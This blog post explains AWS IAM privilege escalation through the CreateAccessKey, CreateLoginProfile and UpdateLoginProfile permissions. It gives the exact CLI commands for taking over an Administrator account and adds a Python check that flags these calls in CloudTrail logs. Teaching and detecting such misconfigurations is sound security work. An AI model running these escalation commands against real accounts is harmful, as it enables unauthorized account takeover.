
Welcome back! Today's topic is exploiting IAM permissions that act on other users: we'll dive into IAM-CreateAccessKey, IAM-CreateLoginProfile and IAM-UpdateLoginProfile. Don't be shy, feel free to contact me on LinkedIn or Twitter if you have any questions.

If you just jumped into my series I recommend starting at the beginning:

Let's get started!

privesc4-CreateAccessKey

The policy grants iam:CreateAccessKey, which lets you create access keys for arbitrary users using --user-name.

Version = "2012-10-17"
Statement = [
  {
    Action   = "iam:CreateAccessKey"
    Effect   = "Allow"
    Resource = "*"
  },
]

Exploitation is as simple as aws iam --profile privesc4 create-access-key --user-name Administrator. The response will provide you with access keys of the high-privileged administrator account. Now just define the credentials as a profile and start taking over the AWS account. ;-)

privesc5-CreateLoginProfile

As you know, there are two ways to authenticate to AWS services: the first is the traditional way, via email address and password on the management console; the second is via access keys. Using CreateLoginProfile, you can create a password for a specific IAM user to authenticate via the AWS management console.


Version = "2012-10-17"
Statement = [
  {
    Action   = "iam:CreateLoginProfile"
    Effect   = "Allow"
    Resource = "*"
  },
]

You can just follow the AWS documentation for the steps to create the password:

aws iam --profile privesc5 create-login-profile --user-name privesc5-CreateLoginProfile-user --password "random_password"

Of course, this only makes sense against a high-privileged account; to make it easier I just chose the privesc5 user. When you are done, you can log in at https://signin.aws.amazon.com/: select log in as an "IAM user" and keep your account number close, you'll need it.

Limitation: This only works if there's not already a login profile attached to the IAM user.

privesc6-UpdateLoginProfile

This time we only have access to iam:UpdateLoginProfile, but again, exploitation is as easy as just following the documentation for update-login-profile.

aws iam --profile privesc6 update-login-profile --user-name Administrator --password "random_password"

These ones were pretty simple. I'll dive into the more complex ones next, but I wanted to cover them to show you that exploitation can be as simple as working by the documentation.
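A defender-side check for the three calls covered above, as an added example that is not part of the original post: it scans CloudTrail records for CreateAccessKey, CreateLoginProfile and UpdateLoginProfile where the target user differs from the caller. The sample records, user names, role name and account ID are constructed for illustration.

```python
# IAM actions from this post that set credentials for the user named in --user-name.
WATCHED = {"CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile"}

def cross_user_credential_events(records):
    """Return findings for watched IAM calls whose target user is not the caller."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com" or rec.get("eventName") not in WATCHED:
            continue
        identity = rec.get("userIdentity") or {}
        # Only IAM users carry userName; a role session is never its own target.
        caller = identity.get("userName") if identity.get("type") == "IAMUser" else None
        # requestParameters is null when CreateAccessKey is called without
        # --user-name, in which case the key belongs to the caller.
        target = (rec.get("requestParameters") or {}).get("userName") or caller
        if target is None or target == caller:
            continue
        findings.append({
            "time": rec.get("eventTime"),
            "action": rec["eventName"],
            "caller": identity.get("arn", "unknown"),
            "target": target,
            # errorCode is present only on failed calls (e.g. AccessDenied).
            "succeeded": "errorCode" not in rec,
        })
    return findings

def _rec(name, identity, params, **extra):
    """Build a constructed CloudTrail-style record (not real log data)."""
    return {"eventTime": "2024-01-01T00:00:00Z", "eventSource": "iam.amazonaws.com",
            "eventName": name, "userIdentity": identity, "requestParameters": params, **extra}

def _user(name):
    return {"type": "IAMUser", "userName": name,
            "arn": f"arn:aws:iam::111122223333:user/{name}"}

ROLE = {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/ci/session"}
SAMPLE_RECORDS = [  # constructed sample input
    _rec("CreateAccessKey", _user("privesc4-user"), {"userName": "Administrator"}),
    _rec("CreateAccessKey", _user("alice"), None),  # own key, not flagged
    _rec("UpdateLoginProfile", _user("privesc6-user"), {"userName": "Administrator"},
         errorCode="AccessDenied"),
    _rec("CreateLoginProfile", ROLE, {"userName": "bob"}),
    _rec("UpdateLoginProfile", _user("alice"), {"userName": "alice"}),  # self, not flagged
]

if __name__ == "__main__":
    for finding in cross_user_credential_events(SAMPLE_RECORDS):
        print(finding)
```

Failed attempts are kept with `succeeded` set to false, since a denied cross-user call is still a sign that someone is probing these permissions.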


Robert Kugler

Information security and human rights enthusiast

